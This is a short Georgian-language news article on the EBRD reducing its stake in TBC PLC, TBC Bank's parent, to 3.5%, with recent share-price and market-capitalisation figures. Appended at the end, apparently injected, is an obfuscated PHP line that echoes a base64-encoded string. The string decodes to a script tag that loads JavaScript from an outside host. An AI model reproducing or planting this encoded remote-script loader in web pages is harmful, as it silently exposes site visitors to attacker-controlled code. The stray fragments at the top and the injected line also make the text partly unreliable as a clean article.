celsiusi
ავერსი შნაიდერი
ევროპის რეკონსტრუქციისა და განვითარების ბანკმა (EBRD) დღეს გამოაქვეყნა ინფორმაცია, რომლიდანაც ირკვევა, რომ ბანკმა TBC PLC-ში, ანუ "თიბისი ბანკის" მშობელ კომპანიაში საკუთარი წილი 1.5 პროცენტული პუნქტით შეამცირა და ის ამჟამად ბანკის 3.5%-ის წილს ფლობს. სულ გაყიდული აქციების რაოდენობა 850,000-ს შეადგენს. 
 
"აქციების გაყიდვა 2022 წლის 22 ნოემბერს მოხდა. შედეგად, EBRD-ი მის პარტნიორ "თიბისი ბანკში" 3.5%-იან წილს ფლობს. 
 
EBRD როგორც "თიბისი ბანკის" აქციონერი, დარწმუნებული თიბისის ძლიერ საქმიანობასა და მომავალი ზრდისა და სტრატეგიული განვითარების ნათელ პერსპექტივაში. EBRD ასევე ერთგულია მხარი დაუჭიროს თიბისის რეგიონულ გაფართოებას,"- ნათქვამია გამოქვეყნებულ ინფორმაციაში. 
 
EBRD-მა "თიბისის" აქციები 2009 წელს, დაფინანსების პროგრამის ფარგლებში შეიძინა. TBC PLC-ის აქციები ლონდონის საფონდო ბირჟაზე 2014 წელს დაილისტა, ხოლო 2016 წლიდან ის ბირჟის პრემიუმ სეგმენტში ივაჭრება. 
 
გასულ კვირაში TBC PLC-ის აქციების ღირებულება 0.46%-ით გაიზარდა, შედეგად, ბანკის ერთი აქცია 21.80 გირვანქა სტერლინგი ღირს. კომპანიის საბაზრო კაპიტალიზაციამ ამ მატების შედეგად 1.2 მილიარდ გირვანქა სტერლინგს მიაღწია. ბოლო სამ თვეში "თიბისის" აქციების ფასი 41%-ით გაიზარდა, ერთთვიან ჭრილში ზრდა კი 22%-ს აღწევს.
521
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");